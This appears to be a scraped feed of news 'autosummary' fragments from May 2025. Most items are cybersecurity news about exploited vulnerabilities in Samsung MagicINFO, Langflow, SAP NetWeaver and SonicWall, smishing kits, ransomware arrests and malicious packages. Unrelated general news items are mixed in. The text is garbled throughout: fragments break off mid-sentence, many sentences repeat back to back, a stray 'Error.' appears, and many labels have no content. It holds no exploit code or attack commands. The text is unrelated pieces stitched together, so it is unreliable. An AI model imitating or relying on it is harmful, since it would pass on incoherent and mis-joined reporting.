Smishing on a Massive Scale: ‘Panda Shop’ Chinese Carding Syndicate Pierluigi Paganini May 06, 2025 May 06, 2025 Resecurity found a new smishing kit called ‘Panda Shop,’ mimicking Smishing Triad tactics with improved features and new templates. "Autosummary:
"An easily and remotely exploitable vulnerability (CVE-2024-7399) affecting Samsung MagicINFO, a platform for managing content on Samsung commercial displays, is being leveraged by attackers. Exploit attempts have been flagged by the SANS Internet Storm Center and Arctic Wolf researchers: the attackers are using the vulnerability to upload and execute a script that contains a downloader for a Mirai bot. About CVE-2024-7399 Samsung MagicINFO is a digital signage management platform that is used to create, schedule, … More
The post Exploited: Vulnerability in software for managing Samsung digital displays (CVE-2024-7399) appeared first on Help Net Security.
"Autosummary:
About CVE-2024-7399 Samsung MagicINFO is a digital signage management platform that is used to create, schedule, and manage multimedia content on Samsung commercial displays, which are often used in transportation hubs, retail stores, restaurants, corporate lobbies, healthcare organizations, financial institutions, etc. "Autosummary:
Google fixed actively exploited Android flaw CVE-2025-27363 Pierluigi Paganini May 06, 2025 May 06, 2025 Google addressed 46 Android security vulnerabilities, including one issue that has been exploited in attacks in the wild. "Autosummary:
Peru imposes curfew after kidnap and murder of 13 mine workers The miners were killed after being kidnapped by criminal gangs, authorities allege La Poderosa, the Peruvian company which owns the gold mine at which the men worked, said they had been kidnapped by "illegal miners colluding with criminals" on 26 April. "Autosummary:
" On Friday, May 1st, Harrods confirmed that it restricted internet access to sites after threat actors also tried to breach its network, suggesting an active response to a cyberattack, although a breach has yet to be confirmed. "Autosummary:
The tool, which has nearly 60k stars and 6.3k forks on GitHub, is used by AI developers, researchers, and startups, for prototyping chatbots, data pipelines, agent systems, and AI applications. "Autosummary:
" The rest of the flaws fixed by Google this month concern problems in Framework, System, Google Play, and the Android Kernel, as well as security gaps in proprietary components from MediaTek, Qualcomm, Arm, and Imagination Technologies. "Autosummary:
For most phones it works like this: Under About phone or About device you can tap on Software updates to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device. "A missing authentication vulnerability (CVE-2025-3248) in Langflow, a web application for building AI-driven agents, is being exploited by attackers in the wild, CISA has confirmed by adding it to its Known Exploited Vulnerabilities (KEV) catalog. About CVE-2025-3248 Langflow is an open-source, Python-based app that allows users to create AI agents (e.g., chatbots assistants) and workflows without actually writing any code. Instead, they simply drag, drop and chain LLM components and add the neccessary inputs. Unfortunately, … More
The post RCE flaw in tool for building AI agents exploited by attackers (CVE-2025-3248) appeared first on Help Net Security.
"Autosummary:
A missing authentication vulnerability (CVE-2025-3248) in Langflow, a web application for building AI-driven agents, is being exploited by attackers in the wild, CISA has confirmed by adding it to its Known Exploited Vulnerabilities (KEV) catalog. "Autosummary:
"Autosummary:
Reckless Rabbit is said to have been creating domains as far back as April 2024, primarily targeting users in Russia, Romania, and Poland, while excluding traffic from Afghanistan, Somalia, Liberia, Madagascar, and others." Some of these forms, besides requesting users" names, phone numbers, and email addresses, offer the ability to auto-generate a password, a key piece of information that"s used to progress to the next phase of the attack -- validation checks. What"s more, the ads contain unrelated images and display a decoy domain (e.g., "amazon[.]pl") that"s different from the actual domain the user will be redirected to once they click on the link (e.g., "tyxarai[.]org"). "Autosummary:
Experts warn of a second wave of attacks targeting SAP NetWeaver bug CVE-2025-31324 Pierluigi Paganini May 06, 2025 May 06, 2025 Threat actors launch second wave of attacks on SAP NetWeaver, exploiting webshells from a recent zero-day vulnerability. "Autosummary:
U.S. CISA adds Langflow flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini May 06, 2025 May 06, 2025 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Langflow flaw to its Known Exploited Vulnerabilities catalog. "Autosummary:
From a technical perspective, CVE-2025-30065 is a deserialization flaw in the parquet-avro module of Apache Parquet Java, where the library fails to restrict which Java classes can be instantiated when reading Avro data embedded in Parquet files. "Autosummary:
"Autosummary:
"Autosummary:
A small payment amount, designed to make it more likely that you will pay up without asking questions Impersonation of a trusted toll road brand such as E-ZPass, which operates toll roads across 20 states, or even a state authority Request for information such as driver’s license number and license plates A link in the text message, which could covertly install malware or take you to a website to fill in personal and financial information A phishing site also spoofed with the branding of the legitimate toll road operator Sometimes scams are easy to spot, such as when they are sent out to drivers in states with no toll roads, such as Michigan or Wisconsin. Delete any scam texts once read and reported.. What to do if you think you’ve been scammed In the even the worst happens and you think you may have fallen victim to a toll road smishing text, don’t panic and follow these steps: Freeze your bank cards and inform your bank (if you have shared financial details with the scammers) Initiative a credit freeze with the three main credit reporting agencies (Experian, TransUnion, Equifax). "Autosummary:
Save Liv McMahon & Tom Gerken Technology reporters Share Save John Walker John Walker took this photo of empty shelves in a Co-op in Llanrwst, Conwy Co-op customers have complained as stores are being left with empty shelves while the retailer battles with a major cyber attack disrupting deliveries of fresh stock. "Vuls is an open-source tool that helps users find and manage security vulnerabilities. It was created to solve the daily problems admins face when trying to keep servers secure. Many administrators choose not to use automatic software updates because they want to avoid downtime in production. Instead, they update systems manually. This creates challenges. Admins must watch databases like the National Vulnerability Database (NVD) for new threats. When there are many packages installed, tracking all … More
The post Vuls: Open-source agentless vulnerability scanner appeared first on Help Net Security.
"Autosummary:
It offers compatibility with numerous Linux distributions, including Alpine (3.3 and later), Ubuntu (14.04 through 24.04), Debian (8 through 12), Red Hat Enterprise Linux (RHEL 5 through 9), Fedora (32 through 39), Oracle Linux (5 through 7), CentOS (6 through 8, including Stream 8 and 9), AlmaLinux (8 and 9), Rocky Linux (8 and 9), Amazon Linux (all versions), openSUSE (Tumbleweed), openSUSE Leap (15.2 and 15.3), SUSE Linux Enterprise (11 through 15), and Raspbian (Jessie, Stretch, Buster). Beyond Linux, Vuls extends its support to FreeBSD (versions 10 and 11), Windows (both client and server editions), and macOS (including macOS X, macOS X Server, and macOS Server). Can run offline without internet access on Red Hat, Fedora, CentOS, AlmaLinux, Rocky Linux, Oracle Linux, Ubuntu, and Debian systems. "90% of IT and security leaders said their organization experienced a cyberattack within the last year, according to a report by Rubrik. “Many organizations that move to the cloud assume their providers will handle security,” said Joe Hladik, Head of Rubrik Zero Labs. “The persistence of ransomware attacks, coupled with the exploitation of hybrid cloud vulnerabilities, shows that threat actors are always one step ahead. Companies must take action and adopt an attacker’s mindset by … More
The post Ransomware spike exposes cracks in cloud security appeared first on Help Net Security.
"Autosummary:
The most common attack vectors cited were data breaches (30%), malware on devices (29%), cloud or SaaS breaches (28%), phishing (28%), and insider threats (28%). "Autosummary:
“According to the indictment, from March 2021 to June 2023, Ahmed and others infected computer networks of several U.S.-based victims, including a medical billing services company in Encino, a ski resort in Oregon, a school district in Pennsylvania, and a health clinic in Wisconsin. "Autosummary:
Error. "CISOs know cyber risk is business risk. Boards don’t always see it that way. For years, CISOs have struggled to get boards to understand security beyond buzzwords. Many feel they’re either ignored or misunderstood. But with threats growing and regulations tightening, that’s changing. Boards now expect CISOs to speak their language: risk, dollars, impact. Here’s how security leaders can get through, with real-world tips on making cybersecurity resonate in the boardroom. Translate risk into dollars … More
The post How CISOs can talk cybersecurity so it makes sense to executives appeared first on Help Net Security.
"Autosummary:
“I start by estimating three things: how often something bad might happen, how much it could cost, and what the business impact could be in terms of brand, sales, or market share,” he explains.They are also more likely to be given the ability to pursue use cases for generative AI, such as creating threat detection rules, analyzing data sources, incident response and forensic investigations, and proactive threat hunting, according to recent Splunk research. Tie security to business goals To align cybersecurity with business goals, CISOs must understand the company’s core mission and identify where security intersects with that mission “An example of this is creating a talk track on how cybersecurity protects revenue and growth,” said Turgal. Rather than talking about malware variants or attack vectors, Turgal presents scenarios such as: “The risk of a ransomware attack this year is 5 percent, and if it happens, the average loss would be $4.5 million.”Boards now expect CISOs to speak their language: risk, dollars, impact. Here’s how security leaders can get through, with real-world tips on making cybersecurity resonate in the boardroom. "In this Help Net Security interview, Stuart Clarke, CEO at Blackdot Solutions, discusses the strategic use of open-source intelligence (OSINT) in tackling financial crime. He outlines its application in areas such as fraud, sanctions evasion, and money laundering, and addresses the legal, ethical, and operational challenges involved. Clarke also provides case studies illustrating how OSINT has been used to uncover criminal networks. Are there specific financial crime typologies, such as fraud, money laundering, or sanctions … More
The post How OSINT supports financial crime investigations appeared first on Help Net Security.
"Autosummary:
He outlines its application in areas such as fraud, sanctions evasion, and money laundering, and addresses the legal, ethical, and operational challenges involved.Yet open-source data is often fragmented and is spread across corporate registries, publicly available social media, news archives, the dark web, and more.What’s important to emphasise, however, is that while we can identify certain core typologies – like fraud, sanctions evasion, and money laundering – they must remain fluid. Are there specific financial crime typologies, such as fraud, money laundering, or sanctions evasion, where OSINT has proven particularly valuable?Investigators overlaid leaked names and corporate data with public registries, sanctions databases, and corporate network analysis, exposing global webs of tax evasion and illicit asset concealment by individuals and companies. "Effective Vulnerability Management offers a view of a key part of cybersecurity, showing how practices, tools, and processes can help organizations reduce risk. About the authors Chris Hughes is the President of Aquia, a cybersecurity leader with 20 years of public and private sector experience, who also serves as a professor, and CISA Cyber Innovation Fellow. Nikki Robinson is a Security Architect and Professor of Practice at Capitol Technology University, with dual doctorates in Cybersecurity … More
The post Review: Effective Vulnerability Management appeared first on Help Net Security.
"Autosummary:
About the authors Chris Hughes is the President of Aquia, a cybersecurity leader with 20 years of public and private sector experience, who also serves as a professor, and CISA Cyber Innovation Fellow. "Autosummary:
"Autosummary:
This week"s list includes — CVE-2025-3928 (Commvault Web Server), CVE-2025-1976 (Broadcom Brocade Fabric OS), CVE-2025-46271, CVE-2025-46272, CVE-2025-46273, CVE-2025-46274, CVE-2025-46275 (Planet Technology), CVE-2025-23016 (FastCGI), CVE-2025-43864 (React Router), CVE-2025-21756 (Linux Kernel), CVE-2025-31650 (Apache Tomcat), CVE-2025-46762 (Apache Parquet), CVE-2025-2783 (Google Chrome), CVE-2025-23242, CVE-2025-23243 (NVIDIA Riva), CVE-2025-23254 (NVIDIA TensorRT-LLM), CVE-2025-3500 (Avast Free Antivirus), CVE-2025-32354 (Zimbra Collaboration Server), CVE-2025-4095 (Docker), CVE-2025-30194 (PowerDNS), CVE-2025-32817 (SonicWall Connect Tunnel Windows Client), CVE-2025-29953 (Apache ActiveMQ), CVE-2025-4148, CVE-2025-4149, CVE-2025-4150 (NETGEAR), CVE-2025-2082 (Tesla Model 3), CVE-2025-3927 (Digigram PYKO-OUT), CVE-2025-24522, CVE-2025-32011, CVE-2025-35996, CVE-2025-36558 (KUNBUS Revolution Pi), CVE-2025-35975, CVE-2025-36521 (MicroDicom DICOM Viewer), CVE-2025-2774 (Webmin), CVE-2025-29471 (Nagios), and CVE-2025-32434 (PyTorch). — Multiple security flaws (CVE-2025-2439, CVE-2025-2445, CVE-2025-2446, and CVE-2025-2447) have been disclosed in Menlo Research"s Jan AI, an offline ChatGPT alternative, that could be exploited by remote, unauthenticated attackers to manipulate systems, "With vulnerabilities ranging from missing CSRF protection of state-changing endpoints to command injection, an attacker can leverage these to take control of a self-hosted server or issue drive-by attacks against LLM developers," Snyk said.Flaws Disclosed in Jan AI — Multiple security flaws (CVE-2025-2439, CVE-2025-2445, CVE-2025-2446, and CVE-2025-2447) have been disclosed in Menlo Research"s Jan AI, an offline ChatGPT alternative, that could be exploited by remote, unauthenticated attackers to manipulate systems, "With vulnerabilities ranging from missing CSRF protection of state-changing endpoints to command injection, an attacker can leverage these to take control of a self-hosted server or issue drive-by attacks against LLM developers," Snyk said.End-of-Life Security Disclosures — Tech giants Cisco, Dell Technologies, IBM, Microsoft, Oracle, Red Hat, and others have teamed up for a new OpenEoX framework that hopes to standardize end-of-life (EoL) and end-of-support (EoS) information to better protect the supply chain and combat cybersecurity risks linked to unsupported software and hardware.The intrusions are said to have relied on phishing, vulnerability exploitation (e.g., CVE-2023-23397), poorly-secured edge devices, and brute-force attacks against webmail as initial access vectors, while also repeatedly targeting Roundcube email servers to exfiltrate inbox data and using phishing emails to distribute malware families like HeadLace and OCEANMAP, while attempting to evade detection by hiding behind low-cost and ready-to-use outsourced infrastructure.The intrusions are said to have relied on phishing, vulnerability exploitation (e.g., CVE-2023-23397), poorly-secured edge devices, and brute-force attacks against webmail as initial access vectors, while also repeatedly targeting Roundcube email servers to exfiltrate inbox data and using phishing emails to distribute malware families like HeadLace and OCEANMAP, while attempting to evade detection by hiding behind low-cost and ready-to-use outsourced infrastructure. — Tech giants Cisco, Dell Technologies, IBM, Microsoft, Oracle, Red Hat, and others have teamed up for a new OpenEoX framework that hopes to standardize end-of-life (EoL) and end-of-support (EoS) information to better protect the supply chain and combat cybersecurity risks linked to unsupported software and hardware.The proposed legislation mandates the Department of Commerce to assess the risks posed by routers, modems, and other devices developed, manufactured, or supplied by its adversaries like China, Russia, Iran, North Korea, Cuba, or Venezuela.The proposed legislation mandates the Department of Commerce to assess the risks posed by routers, modems, and other devices developed, manufactured, or supplied by its adversaries like China, Russia, Iran, North Korea, Cuba, or Venezuela.Known as OTF GRIMM, the task force seeks to disrupt violence-as-a-service and brings together law enforcement authorities from Belgium, Denmark, Finland, France, Germany, the Netherlands, and Norway.Known as OTF GRIMM, the task force seeks to disrupt violence-as-a-service and brings together law enforcement authorities from Belgium, Denmark, Finland, France, Germany, the Netherlands, and Norway."OpenEoX introduces a much-needed, unified framework designed to streamline the exchange of end-of-life (EoL) and end-of-security-support (EoSSec) data that enables transparency and efficiency," said Omar Santos, OpenEoX co-chair and Cisco Distinguished Engineer."OpenEoX introduces a much-needed, unified framework designed to streamline the exchange of end-of-life (EoL) and end-of-security-support (EoSSec) data that enables transparency and efficiency," said Omar Santos, OpenEoX co-chair and Cisco Distinguished Engineer. — Two individuals, a 24-year-old man from Middlesbrough and a 30-year-old from the Oost-Brabant region of The Netherlands, have been arrested in a joint international operation dismantling JokerOTP, a sophisticated phishing tool used to intercept two-factor authentication (2FA) codes and steal over £7.5 million.Two Arrested in Connection With JokerOTP Operation — Two individuals, a 24-year-old man from Middlesbrough and a 30-year-old from the Oost-Brabant region of The Netherlands, have been arrested in a joint international operation dismantling JokerOTP, a sophisticated phishing tool used to intercept two-factor authentication (2FA) codes and steal over £7.5 million.In a statement shared with WIRED, security researcher and cryptographer Matt Green said "any end-to-end encrypted system that uses off-device AI inference is going to be riskier than a pure end-to-end system" and that "more private data will go off the device, and the machines that process this data will be a target for hackers and nation-state adversaries.""When, as a result of the fraudulent attack, the victim comes to the ATM to deposit money into their account, they will place their smartphone on the ATM"s NFC module, but instead of their card, they will log in with the drop card, to whom the entire amount will be sent."In a statement shared with WIRED, security researcher and cryptographer Matt Green said "any end-to-end encrypted system that uses off-device AI inference is going to be riskier than a pure end-to-end system" and that "more private data will go off the device, and the machines that process this data will be a target for hackers and nation-state adversaries."Where compromised, hosts remain vulnerable to the delivery of any payload the operators choose to deliver, whether of their own or sold as Pay-Per-Install or Malware-as-a-Service on underground markets," the company said."Where compromised, hosts remain vulnerable to the delivery of any payload the operators choose to deliver, whether of their own or sold as Pay-Per-Install or Malware-as-a-Service on underground markets," the company said. "Autosummary:
" However, BleepingComputer has learned that both the M&S and Co-op attacks have been attributed to hackers utilizing tactics commonly associated with Scattered Spider, Lapsus$, and other threat actors who frequent the same Telegram channels, Discord servers, and hacking forums. "Autosummary:
The mitigation is to enable the "Online Authorization" feature in the Sentinel Policy settings that, when enabled, requires approval from the SentinelOne management console before local upgrades, downgrades, or uninstalls of the agent can occur. "Autosummary:
In February 2025, the same researchers reported that Darcula had undergone a significant evolution, now allowing operators to auto-generate phishing kits for any brand, while also implementing new stealth features, a credit card to virtual card converter, and a simplified admin panel. "Autosummary:
"Autosummary:
Kelly Benefits is notifying affected individuals on behalf of multiple customers, including CareFirst, Guardian, Beam Benefits, and others impacted by the breach. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: RSAC 2025 Conference RSAC 2025 Conference took place at the Moscone Center in San Francisco. Check out our microsite for related news, photos, product releases, and more. Critical SAP NetWeaver flaw exploited by suspected initial access broker (CVE-2025-31324) CVE-2025-31324, a critical vulnerability in the SAP NetWeaver platform, is being actively exploited by attackers to upload malicious webshells to enable unauthorized … More
The post Week in review: Critical SAP NetWeaver flaw exploited, RSAC 2025 Conference appeared first on Help Net Security.
"Autosummary:
Infosec products of the month: April 2025 Here’s a look at the most interesting products from the past month, featuring releases from: 1touch.io, Abnormal AI, AppViewX, Arctic Wolf Networks, Bitdefender, BitSight, Bugcrowd, Cato Networks, CyberQP, Cyware, Entrust, Exabeam, Flashpoint, Forescout, Index Engines, Jit, LastPass, PlexTrac, PowerDMARC, RunSafe Security, Saviynt, Seal Security, Seemplicity, Skyhawk Security, Stellar Cyber, Swimlane, Varonis, and Veracode. Online fraud peaks as breaches rise In this Help Net Security video, Steve Yin, Global Head of Fraud at TransUnion, and Brad Daughdrill, VP, Data Science, Head of Global Fraud Analytics, TransUnion, discuss their latest fraud report focused on data breaches and their severity and impact on financial business. Download: Edgescan 2025 Vulnerability Statistics Report Edgescan’s 2025 Vulnerability Statistics Report explores risk density patterns across network/device and application layers, uncovers complex vulnerabilities that automated tools consistently miss, and evaluates the real-world effectiveness of leading vulnerability scoring methodologies, including EPSS, CISA KEV, CVSS, and our proprietary EVSS system. "Autosummary:
StealC v2 new admin panel Source: Zscaler However, apart from the feature additions, there have also been some notable removals, like the anti-VM checks and DLL downloading/execution. "Autosummary:
Malicious Go Modules designed to wipe Linux systems Pierluigi Paganini May 04, 2025 May 04, 2025 Researchers found 3 malicious Go modules with hidden code that can download payloads to wipe a Linux system’s main disk, making it unbootable. "Autosummary:
"Autosummary:
The person responsible for the plan and a teenager were arrested, the police said on X. The Civil Police of Rio de Janeiro state, in co-ordination with the justice ministry, said suspects had recruited participants to carry out attacks using improvised explosives and the plan was aimed at gaining notoriety on social media. "Autosummary:
"Autosummary:
The Wayuu indigenous group, which Mr Iguarán belongs to, has lived on the arid peninsula region for centuries, herding goats, tending to crops, mining salt, and fishing. Catherine Ellis The Guajira 1 wind farm is very close to José Luis Iguarán"s home "The wind farms produce clean energy, but they create division within the Wayuu communities," explains Aaron Laguna, a Wayuu fisherman, who lives in the coastal village of Cabo de la Vela.The energy company behind it, Colombian firm Isagen, has paid for them to have access to clean drinking water, better roads, and sturdy brick houses, which have replaced some of the mud and cactus ones. "Autosummary:
"Autosummary:
The ransomware payment resolution rate for the period has been tallied at 27%, down from 85% in Q1 2019, 73% in Q1 2020, 56% in Q1 2021, 46% in Q1 2022, 45% in Q1 2023, and 28% in Q1 2024. "From March 2021 to June 2023, Ahmed and others infected computer networks of several U.S.-based victims, including a medical billing services company in Encino, a ski resort in Oregon, a school district in Pennsylvania, and a health clinic in Wisconsin," the DoJ said in a statement. Leonidas Varagiannis (aka War), 21, and Prasan Nepal (aka Trippy), 20, the two alleged leaders of a child extortion group 764 have been arrested and charged with directing and distributing child sexual abuse material (CSAM). "Autosummary:
The attack analyzed by Fortinet against the CNI entity unfolded over four stages starting from May 2023, employing an evolving arsenal of tools as the victim enacted countermeasures - 15 May, 2023 – 29 April, 2024 - Establishing a foothold by using stolen login credentials to access the victim"s SSL VPN system, drop web shells on public-facing servers, and deploy three backdoors, Havoc, HanifNet, and HXLibrary, for long-term access - Establishing a foothold by using stolen login credentials to access the victim"s SSL VPN system, drop web shells on public-facing servers, and deploy three backdoors, Havoc, HanifNet, and HXLibrary, for long-term access 30 April, 2024 – 22 November, 2024 - Consolidating the foothold by planting more web shells and an additional backdoor called NeoExpressRAT, using tools like plink and Ngrok to burrow deeper into the network, performing targeted exfiltration of the victim"s emails, and conducting lateral movement to the virtualization infrastructure - Consolidating the foothold by planting more web shells and an additional backdoor called NeoExpressRAT, using tools like plink and Ngrok to burrow deeper into the network, performing targeted exfiltration of the victim"s emails, and conducting lateral movement to the virtualization infrastructure 23 November, 2024 – 13 December, 2024 - Deploying more web shells and two more backdoors, MeshCentral Agent and SystemBC, in response to initial containment and remediation steps undertaken by the victim - Deploying more web shells and two more backdoors, MeshCentral Agent and SystemBC, in response to initial containment and remediation steps undertaken by the victim 14 December, 2024 – Present - Attempts to infiltrate the network again by exploiting known Biotime vulnerabilities (CVE-2023-38950, CVE-2023-38951, and CVE-2023-38952) and spear-phishing attacks aimed at 11 of the employees to harvest Microsoft 365 credentials after the victim successfully removed adversary"s access It"s worth noting that both Havoc and MeshCentral are open-source tools that function as a command-and-control (C2) framework and remote monitoring and management (RMM) software, respectively. "Autosummary:
Below are the descriptions for these flaws: CVE-2025-34028 Commvault Command Center Path Traversal Vulnerability CVE-2024-58136 Yiiframework Yii Improper Protection of Alternate Path Vulnerability The vulnerability CVE-2025-34028 (CVSS score of 10) is a path traversal vulnerability in Commvault Command Center Innovation An unauthenticated attacker can exploit the flaw to upload ZIP files, which, when expanded by the target server, could result in Remote Code Execution. "Autosummary:
The packages, which have since been removed, are as follows - cfc-bsb (2,913 downloads) coffin2022 (6,571 downloads) coffin-codes-2022 (18,126 downloads) coffin-codes-net (6,144 downloads) coffin-codes-net2 (6,238 downloads) coffin-codes-pro (9,012 downloads) coffin-grave (6,544 downloads) The packages use hard-coded Gmail account credentials to sign-in to the service"s SMTP server and send a message to another Gmail address to signal a successful compromise. "Autosummary:
"Autosummary:
“This data includes Co-op Group members’ personal data such as names and contact details, and did not include members’ passwords, bank or credit card details, transactions or information relating to any members’ or customers’ products or services with the Co-op Group,” a spokesperson told BBC. "Autosummary:
"I can"t wait for her to sing Abracadabra, it"s great to dance to, like her early stuff," he said. "Threat actors are increasingly harnessing automation, commoditized tools, and AI to systematically erode the traditional advantages held by defenders, according to Fortinet.
The post AI and automation shift the cybersecurity balance toward attackers appeared first on Help Net Security.
"Autosummary:
In addition to zero-day vulnerabilities circulating on the darknet, initial access brokers are increasingly offering corporate credentials (20%), RDP access (19%), admin panels (13%), and web shells (12%). "Phone theft is a rising issue worldwide, and it’s more than just a property crime. It’s a serious cybersecurity threat. In the UK alone, the Metropolitan Police seizes 1,000 phones each week. Stolen phones don’t just go to local black markets. They often get funneled into larger criminal operations. For example, stolen phones can be used to bypass security features or be reprogrammed and resold. In 2024, Europol uncovered a massive phishing network that affected … More
The post Phone theft is turning into a serious cybersecurity risk appeared first on Help Net Security.
"Autosummary:
In cities like Shenzhen, known as the “Silicon Valley of China,” stolen phones are trafficked to tech companies or underground operations, where they are either dismantled for parts or resold after being tampered with. For laptops, typical steps include promptly reporting the theft, remotely locking or wiping the device, and revoking access to company systems. Mobile device security risks According to Verizon’s 2024 Mobile Security Index, 80% of organizations consider mobile devices critical to their operations.Ensure personal devices connecting to company systems are secure (encrypted, updated OS, etc.). "Autosummary:
"Autosummary:
Key benefits of this workflow: Reduces manual effort and speeds up response time Leverages threat intelligence for smarter prioritization Ensures consistent handling of new vulnerabilities Strengthens collaboration across security and IT teams Boosts morale by eliminating tedious tasks Keeps analysts in control with easy, fast approvals Workflow overview Tools used: Tines – workflow orchestration and AI platform (Community Edition available) CrowdStrike – threat intelligence and EDR platform ServiceNow – ticketing and ITSM platform Slack – team collaboration platform How it works: RSS feed collection: fetches the latest advisories from CISA"s RSS feed Deduplication: filters out duplicate advisories Vendor filtering: focuses on advisories from key vendors and services (e.g., Microsoft, Citrix, Google, Atlassian). CVE extraction: identifies CVEs from advisory descriptions Enrichment: cross-references CVEs with CrowdStrike threat intelligence for added context Slack notification: sends an enriched vulnerability with action buttons to a dedicated Slack channel Approval flow: If approved, the workflow creates a ServiceNow ticket If denied, the workflow logs the decision without creating a ticket Configuring the workflow - step-by-step guide The Tines Community Edition sign-up form 1. "Autosummary:
Communication between GhostWeaver and its command-and-control (C2) server is secured through TLS encryption using an obfuscated, self-signed X.509 certificate embedded directly within the PowerShell script, which is leveraged for client-side authentication to the C2 infrastructure," Recorded Future said. "Autosummary:
"Autosummary:
Below are the descriptions for these flaws: CVE-2024-38475 Apache HTTP Server Improper Escaping of Output Vulnerability CVE-2023-44221 SonicWall SMA100 Appliances OS Command Injection Vulnerability This week, SonicWall revealed that attackers actively exploited two security vulnerabilities, tracked as CVE-2023-44221 and CVE-2024-38475, in its SMA100 Secure Mobile Access appliances. "Autosummary:
"Autosummary:
Other high-profile attacks linked to Scattered Spider include those on MGM Resorts, Caesars, MailChimp, Twilio, DoorDash, Coinbase, Riot Games, and Reddit. "Attackers have been using two previously known vulnerabilities (CVE-2024-38475, CVE-2023-44221) to compromise SonicWall secure mobile access devices, the vendor has confirmed by updating the associated advisories. CISA has added the two flaws to its Known Exploited Vulnerabilities catalog, and Watchtowr researchers have analyzed how they can be being chained together and have released a proof-of-concept exploit (or, as they call it, a “Detection Artefact Generator”). The exploited vulnerabilities (CVE-2024-38475, CVE-2023-44221) Sonicwall SMA100 appliances are VPN … More
The post Attackers exploited old flaws to breach SonicWall SMA appliances (CVE-2024-38475, CVE-2023-44221) appeared first on Help Net Security.
"Autosummary:
CISA has added the two flaws to its Known Exploited Vulnerabilities catalog, and Watchtowr researchers have analyzed how they can be being chained together and have released a proof-of-concept exploit (or, as they call it, a “Detection Artefact Generator”). "Autosummary:
In Argentina, the earthquake was felt primarily in Ushuaia, with other towns affected "to a lesser extent", the office for the governor of the region said. "Autosummary:
" "This data includes Co-op Group members" personal data such as names and contact details, and did not include members" passwords, bank or credit card details, transactions or information relating to any members" or customers" products or services with the Co-op Group. DragonForce ransomware behind attack Today, the BBC first reported that affiliates for the DragonForce ransomware operation, the same hackers who breached M&S, are also behind the attack on Co-op. "Autosummary:
"Cybercriminals are increasingly favoring low-tech, human-centric attacks to bypass email scanning technologies, according to VIPRE Security. The report is based on an analysis of global real-world data and highlights the most significant email security trends from the first quarter of 2025. Callback phishing Cybercriminals are taking the sentiment “work smarter, not harder” to a whole other level with callback phishing scams, a vector that wasn’t even part of the equation last year In Q1 2025, … More
The post Low-tech phishing attacks are gaining ground appeared first on Help Net Security.
"Autosummary:
This is pertinent because link usage, which accounted for 75% of phishing attempts in Q1 2024, dropped by 42% in Q1 2025, making room for callbacks, which now account for nearly one in five attempts. "This month’s roundup features exceptional open-source cybersecurity tools that are gaining attention for strengthening security across various environments. GoSearch: Open-source OSINT tool for uncovering digital footprints GoSearch is an open-source OSINT tool built to uncover digital footprints linked to specific usernames. Designed for speed and accuracy, it lets users quickly track someone’s online presence across multiple platforms. Hawk Eye: Open-source scanner uncovers secrets and PII across platforms Hawk Eye is an open-source tool that helps … More
The post Hottest cybersecurity open-source tools of the month: April 2025 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
How to protect your business: Use unique, strong passwords for each online account and store and create these passwords using a password manager Enable “multifactor authentication” on all important business accounts so that hackers who steal passwords cannot access accounts with only usernames and passwords Do not click on links from unknown senders If you’re asked for login information through an email or online message, do not input your login info in the email or through whatever link you’re directed towards. How to protect your business: Use unique, strong passwords for each account and store and create these passwords using a password manager Enable “multifactor authentication” on all important business accounts so that hackers who steal passwords cannot access accounts with only usernames and passwords Avoid phishing attacks by refusing to click on links from unknown senders Do not download any attachments from unknown senders or from unexpected emails. Modern gangs operate on a “Ransomware-as-a-Service” model, where ransomware developers lease out their malicious software to “affiliates” who, if successful in launching an attack, return a small portion of their ill-gotten gains back to the ransomware developers at the top. "Autosummary:
That’s a consistently falling number; 90.32% of zero-day exploits targeted end-user tech in 2019, followed by 70.97%, 74.74%, 63.49%, and 63.27% respectively through 2023.In 2022, it found 63 zero-day exploits, and the year before that it was 95, but 2019 and 2020 both showed just 31 zero-day exploits each. "Autosummary:
Artificial intelligence (AI) company Anthropic has revealed that unknown threat actors leveraged its Claude chatbot for an "influence-as-a-service" operation to engage with authentic accounts across Facebook and X. The sophisticated activity, branded as financially-motivated, is said to have used its AI tool to orchestrate 100 distinct persons on the two social media platforms, creating a network of "politically-aligned accounts" that engaged with "10s of thousands" of authentic accounts. "Autosummary:
Targets of the attacks include entities in the media, tourism, finance and insurance, manufacturing, retail, energy, telecom, transport, and biotechnology sectors, Russian cybersecurity company F6 said. "Autosummary:
"Autosummary:
The company addressed the flaws with the following releases: CVE-2023-44221 – 10.2.1.10-62sv and higher versions (Fixed on December 4, 2023) CVE-2024-38475 – 10.2.1.14-75sv and higher versions (Fixed on December 4, 2024) "Autosummary:
The financially-motivated group targeted organizations in the media, tourism, finance, insurance, manufacturing, energy, telecommunications, biotechnology and retail sectors. "Autosummary:
"She is very grateful, and good-humoured," Sister Terezinha Aragon told Brazilian TV in January, when Sister Inah became the world"s oldest person after the death of the previous holder of the title, Japanese woman Tomiko Itooka at the age of 116. "Autosummary:
According to the U.S. Department of Justice, Stryzhak allegedly participated in ransomware attacks that targeted high-revenue companies, primarily in the United States, Norway, France, Switzerland, Germany, and the Netherlands. "Autosummary:
M&S and Co-op also hit by cyberattacks Last week, Marks and Spencer confirmed it had suffered a cyberattack that led to disruption of its online ordering systems, contactless payments, and Click & Collect service. "Autosummary:
FBI shared a list of phishing domains associated with the LabHost PhaaS platform Pierluigi Paganini May 01, 2025 May 01, 2025 The FBI shared 42K phishing domains tied to LabHost, a PhaaS platform shut down in April 2024, to boost awareness and help identify compromises. In April 2024, an international law enforcement operation, codenamed Nebulae and coordinated by Europol, led to the disruption of LabHost, which is one of the world’s largest phishing-as-a-service platforms. "Autosummary:
Its operations encompass generation, transmission, and distribution of electricity, utilizing a diverse mix of energy sources including coal, natural gas, hydroelectric, wind, tidal, oil, and biomass. "Autosummary:
